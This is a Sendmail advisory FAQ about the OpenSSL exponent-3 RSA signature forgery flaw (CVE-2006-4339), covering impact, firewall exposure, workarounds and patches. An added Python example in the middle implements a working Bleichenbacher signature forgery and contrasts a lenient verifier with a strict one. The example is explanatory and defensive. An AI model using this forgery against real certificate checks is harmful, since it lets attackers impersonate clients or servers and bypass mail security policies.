How was this issue discovered?
The OpenSSL Project recently released a security advisory (CVE-2006-4339)
announcing that RSA signatures made by keys with a small public exponent
(exponent 3) could be forged, which makes it possible to forge certificates
issued by certificate authorities that use such keys. More details regarding
the vulnerability can be found in their advisory, referenced at:
http://www.openssl.org/news/secadv_20060905.txt
How difficult would it be for someone to exploit this vulnerability?
It is not difficult because an exploit has already been posted to the
web.
Has anyone been impacted by this?
Sendmail has not received any reports from customers who have been
impacted by this issue. However, this information is now public and
there is a known published exploit.
What would happen if someone does exploit this?
The sendmail MTA and Sendmail Proxy server can optionally request and
validate an SSL certificate to identify the connecting client or server.
This validation is used to make policy decisions, such as whether to
accept the connection, allow relaying, digitally sign the message,
etc. Due to the OpenSSL bug, this validation can be subverted and the
attacker can bypass policy restrictions.
Note that this bug only affects sites that validate certificates against an
exponent 3 certificate authority. Because the flaw is in signature
verification, every issuer in the trust chain matters: check the root CA
certificate and any intermediate CA certificates, not just the one that
directly signed the peer's certificate. You can check the public exponent
of a certificate with the command:
/usr/local/sendmail/smmta-8.13/sbin/openssl x509 -text -in cacert.pem | grep Exponent
A vulnerable CA prints "Exponent: 3 (0x3)"; the common alternative is
"Exponent: 65537 (0x10001)", which is not affected.
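The following is an added example, not code from Sendmail or OpenSSL, showing why exponent 3 is the problem. It reproduces the forgery technique behind the OpenSSL advisory (Bleichenbacher's PKCS#1 v1.5 signature forgery): an encoded message is built with the correct padding and hash followed by an unused "garbage" region, and its integer cube root is taken, so that cubing the result during verification reproduces the padding and hash exactly while the garbage bytes absorb the rounding error. A verifier that parses the padding from the left and never checks what follows the hash (the pre-fix behaviour) accepts it; a verifier that rebuilds the complete expected encoding and compares every byte (RFC 3447 section 8.2.2) rejects it. The modulus N is a constructed 2048-bit integer, not a real key: the forger never needs the private key, and verification only computes sig**3 mod N. The message and function names are this example's own.

```python
import hashlib
import hmac

# Constructed 2048-bit modulus with public exponent 3. It is NOT a real RSA key:
# the forgery below never touches a private key, and the verifiers only compute
# sig**3 mod N, so any odd 2048-bit integer with the top bit set will do.
N = (1 << 2047) | 0x10001
E = 3
K = (N.bit_length() + 7) // 8          # signatures are 256 bytes long

# DER prefix of DigestInfo for SHA-256 (RFC 3447 section 9.2, note 1)
DIGESTINFO_SHA256 = bytes.fromhex("3031300d060960864801650304020105000420")


def digest_info(msg: bytes) -> bytes:
    return DIGESTINFO_SHA256 + hashlib.sha256(msg).digest()


def icbrt_ceil(n: int) -> int:
    """Smallest integer s with s**3 >= n (binary search on plain ints, no floats)."""
    lo, hi = 0, 1 << (n.bit_length() // 3 + 2)   # hi**3 > n by construction
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 >= n:
            hi = mid
        else:
            lo = mid + 1
    return lo


def forge_signature(msg: bytes) -> int:
    """Forge an e=3 signature that a lenient verifier accepts, with no private key.

    EM = 00 01 FF*8 00 DigestInfo(msg) GARBAGE, with the garbage region set to
    zero. The cube of ceil(cbrt(EM)) exceeds EM by far less than the width of
    the garbage region, so its leading bytes equal the padding and hash exactly,
    and it is far smaller than N, so verification's modular exponentiation is a
    plain cube.
    """
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(msg)
    garbage_len = K - len(prefix)
    target = int.from_bytes(prefix + b"\x00" * garbage_len, "big")
    s = icbrt_ceil(target)
    # sanity: the cube sits below N and the rounding error stays inside the garbage
    assert s ** 3 < N and s ** 3 - target < 1 << (8 * garbage_len)
    return s


def _encoded_message(sig: int) -> bytes:
    return pow(sig, E, N).to_bytes(K, "big")


def verify_lenient(sig: int, msg: bytes) -> bool:
    """Vulnerable verifier, shaped like the pre-fix behaviour: strip the padding
    from the left, parse the DigestInfo found there, compare the hash, and never
    check that nothing follows the hash."""
    em = _encoded_message(sig)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < K and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= K or em[i] != 0x00:    # need >= 8 bytes of FF, then 00
        return False
    t = em[i + 1:]
    want = digest_info(msg)
    return t[:len(want)] == want                 # trailing bytes ignored: the bug


def verify_strict(sig: int, msg: bytes) -> bool:
    """Hardened verifier (RFC 3447 section 8.2.2): rebuild the entire expected
    encoding and compare every byte, so short padding or trailing garbage fails."""
    em = _encoded_message(sig)
    t = digest_info(msg)
    expected = b"\x00\x01" + b"\xff" * (K - len(t) - 3) + b"\x00" + t
    return hmac.compare_digest(em, expected)


if __name__ == "__main__":
    # constructed sample input standing in for a certificate's to-be-signed bytes
    msg = b"constructed sample: tbsCertificate of a forged client certificate"
    forged = forge_signature(msg)
    print("lenient verifier accepts forgery:", verify_lenient(forged, msg))  # True
    print("strict verifier accepts forgery: ", verify_strict(forged, msg))   # False
```

The attacker needs only the CA's public modulus, so any certificate an MTA or proxy validates against an exponent 3 CA can be fabricated this way; a genuine signature decodes to exactly the `expected` encoding, so the strict verifier still accepts it. With exponent 65537 the cube-root trick does not apply, which is why only exponent 3 authorities are affected.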
Are sendmail MTAs behind my firewall vulnerable?
Only machines that accept SMTP, POP over SSL (POPS), or IMAP over SSL
(IMAPS) connections from the outside world, and machines that send SMTP to
the outside world, are vulnerable, assuming they are doing certificate
validation against an exponent 3 certificate authority. Therefore, if your
firewall operates at the application level and terminates these sessions
itself, you may be protected. A packet-filtering firewall passes the SSL
session through untouched and offers no protection, so your MTA is not
protected.
Has Sendmail had similar security issues in the past?
This security issue is a vulnerability in OpenSSL, which is used in
the Sendmail MTA. Prior to this issue, Sendmail had a vulnerability in
certain versions of the Sendmail MTA in July of 2006. That
vulnerability was quickly addressed and resolved by Sendmail.
Although this type of occurrence is not uncommon in the industry,
Sendmail has established procedures to quickly and proactively respond
to security issues.
What are you doing to notify affected users?
Sendmail has notified all supported and unsupported customers who use
the affected Sendmail products. Additionally, Sendmail has posted
advisories on Sendmail's Website: http://www.sendmail.com/security/.
What should users do until they can install the patches?
If you are using an exponent 3 certificate authority and are unable
to install the patch immediately, you can work around this problem by
employing alternative methods of validating connections, such as SMTP
authentication for MTA related policy.
What should the users do to request the patches?
Sendmail is notifying our supported and unsupported customers about the
patches for specific product releases and platforms and providing the
information on how to download and obtain these patches or upgrades.
Customers do not need to specifically request patches. They may
download them directly from the ftp site given in the security advisory.
How important is this issue, how quickly should I plan to upgrade?
If you are using certificate verification with an exponent 3 certificate
authority, Sendmail's threat assessment of this issue is high. There is
already a known published exploit.
What are my options?
You may patch your system or configure your MTA to avoid the impacts.
See "What should users do until they can install the patches?" above for
more information.
Will this issue shut down my server?
No, this vulnerability will not shut down your server, but it may be
exploited to bypass security policies.
Will this issue cause me to lose mail?
No, this vulnerability will not cause you to lose mail.
Is this issue related to the recent security vulnerability in certain versions of sendmail Mail Transfer Agent?
No, this vulnerability is not related to the recent Sendmail MTA
security vulnerability.
What are all the new changes included in the Switch 3.1.11, Switch 3.2.5, Sentrion 1.5.5, and Proxy 2.2.3 patches?
1. Changes to the sendmail MTA binary to resolve this
vulnerability.
2. Changes to the POP/IMAP proxy binary to resolve this
vulnerability.
How can I verify this is a legitimate security advisory?
Customers can contact Sendmail Technical Support as listed on
/sm/contact/ to verify the authenticity of
this advisory. The email notification sent to Sendmail customers is
signed with PGP, using the Sendmail, Inc. Security Officer PGP key,
available at: http://www.sendmail.com/security/security-officer.asc.
In addition, a PGP signed copy is available for download at:
http://www.sendmail.com/security/, signed with the same key.